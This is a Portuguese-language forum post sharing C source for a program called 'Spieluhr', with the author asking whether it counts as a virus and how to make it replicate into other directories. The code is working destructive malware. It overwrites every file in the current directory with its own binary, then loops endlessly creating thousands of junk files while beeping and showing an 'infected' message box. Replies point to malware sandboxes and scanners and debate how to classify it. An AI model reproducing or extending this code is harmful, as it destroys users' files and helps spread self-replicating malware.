Spieluhr - esse código pode ser considerado um vírus?

Publicado por Saw (última atualização em 12/01/2022)

[ Hits: 1.686 ]

Download 7220.Spieluhr.c




Olá pessoal, então... Estava pensando em estudar desenvolvimentos de malwares(VOLTADO PARA ESTUDOS SÓ), e criei esse código o nomeei de (spieluhr). Porém não sei se ele pode ser considerado um vírus... Se alguém puder tirar minha dúvida agradeço. O código está todo comentado para facilitar a compreensão de vocês, agradeço a atenção.
Por enquanto ele só se replica nos arquivos do diretório atual, se alguém puder passar uma ajuda de como posso fazer para ele se replicar a outros diretórios etc agradeço.

  



Esconder código-fonte

#include <stdio.h> // Importa a biblioteca de entrada e saida
#include <stdlib.h> // Importa a biblioteca do sistema
#include <dirent.h> // Importa a biblioteca de diretórios
#include <windows.h> // Importa a API do windows
int main(void) // Função Main para iniciação do algoritmo
{
    DIR *dir; // Ponteiro para o diretório
    struct dirent *lsdir; // Estrutura para armazenar os nome dos arquivos
    FILE *mal; // Ponteiro para abrir o vírus
    FILE *host; // Ponteiro para abrir o arquivo a ser infectado
    dir = opendir("."); // Ponteiro que recebe o diretório
    while (( lsdir = readdir(dir)) != NULL ) // Estrutura While para ler o que há nos diretórios
    {
        char Buffer[42269]; // Buffer para armazenar o binário do vírus
        mal = fopen("Spieluhr.exe", "rb"); // Abre o vírus em modo leitura de binários
        host = fopen(lsdir->d_name, "rb+"); // Abre o arquivo a ser infectado leitura\escrita de binário
        fread(Buffer, 42269, 1, mal); // Ler o código binário do vírus
        fwrite(Buffer, 42269, 1, host); // Escreve o binário do vírus no hospedeiro
    }
    int x = 0; // Cria variável do tipo inteiro para o for seguinte
    FILE *cf; // Cria um ponteiro para arquivo "CREATE FILE"
    char c; // Char para receber inteiros e converter para números
    char *ps; // Ponteiro para apontar para C
    int l = 65; // Interio para iniciar a contagem
    while(x < 3) // Laço WHILE para terminar de executar as ações proprostas
    { 
        for(l; l < 10000; ++l) // For de l(65) até l(1000)
        {   
            c = l; //Char para receber L e converter para char
            ps = &c; // Apontador para C
            cf = fopen(ps, "w"); //Gerador de arquivo
        }
        printf("\a"); // Solta o som do windows 
        Sleep(1000); // Faz a máquina esperar 1 segundos para a próxima Execução
        MessageBox(0, "YOU BEEN INFECTED", "Spieluhr", MB_OK); // Windows Box
        //O While está sem incremento para manter o laço infinito
    }
    closedir(dir);
    return 0; // Retorna 0 a função main
}

Scripts recomendados

Criptografar um Arquivo de Texto por cifra de Transposição

Cifra de Cesar - Cripto-Analise

Código C para gerar hashes DES e MD5

Criptografia rot13

Faz um crash no Kernel do Linux


  

Comentários
[1] Comentário enviado por junior_ em 14/01/2022 - 08:11h


Olá, talvez você possa colocar este cara em uma Sandbox online pra verificar se é detectável e também verificar esta amostra no virustotal. Geralmente para analise de Ransomware Microsoft tem servido bem, mas testa pra Gnu Linux/Unix.

https://www.virustotal.com/gui/home/upload

SANDBOX(Caixa de areia...rs)
https://www.hybrid-analysis.com/
https://app.any.run/

[2] Comentário enviado por junior_ em 14/01/2022 - 08:24h

Este acho que consegue verificar/checar em Shell Script/Bash.

https://metadefender.opswat.com/

[3] Comentário enviado por junior_ em 14/01/2022 - 08:25h


Outros Similares/Equivalentes.

https://www.raymond.cc/blog/battle-of-the-6-online-malware-file-scanners/

[4] Comentário enviado por maurixnovatrento em 25/01/2022 - 22:14h


Interessante. Já é possível se ter uma ideia de como pode funcionar um malware.

___________________________________________________________
Conhecimento não se Leva para o Túmulo.
https://github.com/mxnt10

[5] Comentário enviado por aguamole em 05/10/2023 - 21:57h

@Saw Esse while aparentemente ele roda infinito e a cada while sempre mostra a sandbox certo? Se isso for verdade é um malware sim da categoria vírus, ele também é um worm. Se ele contamina outros arquivos nesta ele também se enquadra na categoria de vírus. Esse tipo de malware é usado para ataque DoS. Tenha um bom estudo.
Eu apenas lê os comentários do código fonte, não entendo de programação de C.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts